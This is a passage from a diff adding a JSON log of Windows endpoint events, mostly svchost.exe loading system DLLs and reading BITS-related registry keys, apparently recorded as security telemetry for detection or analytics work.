131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "FlightSettings.dll", + "image_path": "C:\\Windows\\System32\\FlightSettings.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bcd.dll", + "image_path": "C:\\Windows\\System32\\bcd.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "winhttp.dll", + "image_path": "C:\\Windows\\System32\\winhttp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "netprofm.dll", + "image_path": "C:\\Windows\\System32\\netprofm.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "npmproxy.dll", + "image_path": "C:\\Windows\\System32\\npmproxy.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573456980000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bitsigd.dll", + "image_path": "C:\\Windows\\System32\\bitsigd.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457140000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "upnp.dll", + "image_path": "C:\\Windows\\System32\\upnp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457140000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ssdpapi.dll", + "image_path": "C:\\Windows\\System32\\ssdpapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "sxs.dll", + "image_path": "C:\\Windows\\System32\\sxs.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "AppXDeploymentClient.dll", + "image_path": "C:\\Windows\\System32\\AppXDeploymentClient.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "StateRepository.Core.dll", + "image_path": "C:\\Windows\\System32\\StateRepository.Core.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\BITS", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\BITS\\Start", + "registry_value": "Start", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "Windows.Storage.OneCore.dll", + "image_path": "C:\\Windows\\System32\\Windows.Storage.OneCore.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573457290000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "WsmAuto.dll", + "image_path": "C:\\Windows\\System32\\WsmAuto.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "miutils.dll", + "image_path": "C:\\Windows\\System32\\miutils.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "WsmSvc.dll", + "image_path": "C:\\Windows\\System32\\WsmSvc.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "pcwum.dll", + "image_path": "C:\\Windows\\System32\\pcwum.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "mi.dll", + "image_path": "C:\\Windows\\System32\\mi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "userenv.dll", + "image_path": "C:\\Windows\\System32\\userenv.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "gpapi.dll", + "image_path": "C:\\Windows\\System32\\gpapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\System32\\sspicli.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "OnDemandConnRouteHelper.dll", + "image_path": "C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", + "registry_value": "Connections", + "timestamp": 131883573458080000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "webio.dll", + "image_path": "C:\\Windows\\System32\\webio.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "rasadhlp.dll", + "image_path": "C:\\Windows\\System32\\rasadhlp.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573458230000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "usermgrcli.dll", + "image_path": "C:\\Windows\\System32\\usermgrcli.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ExecModelClient.dll", + "image_path": "C:\\Windows\\System32\\ExecModelClient.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "CoreMessaging.dll", + "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "twinapi.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "rmclient.dll", + "image_path": "C:\\Windows\\System32\\rmclient.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "coml2.dll", + "image_path": "C:\\Windows\\System32\\coml2.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreCommonProxyStub.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "execmodelproxy.dll", + "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ResourcePolicyClient.dll", + "image_path": "C:\\Windows\\System32\\ResourcePolicyClient.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "vssapi.dll", + "image_path": "C:\\Windows\\System32\\vssapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "vsstrace.dll", + "image_path": "C:\\Windows\\System32\\vsstrace.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "samlib.dll", + "image_path": "C:\\Windows\\System32\\samlib.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "es.dll", + "image_path": "C:\\Windows\\System32\\es.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "BitsProxy.dll", + "image_path": "C:\\Windows\\System32\\BitsProxy.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "BitsProxy.dll", + "image_path": "C:\\Windows\\System32\\BitsProxy.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "esentprf.dll", + "image_path": "C:\\Windows\\System32\\esentprf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 4292, + "process_name": 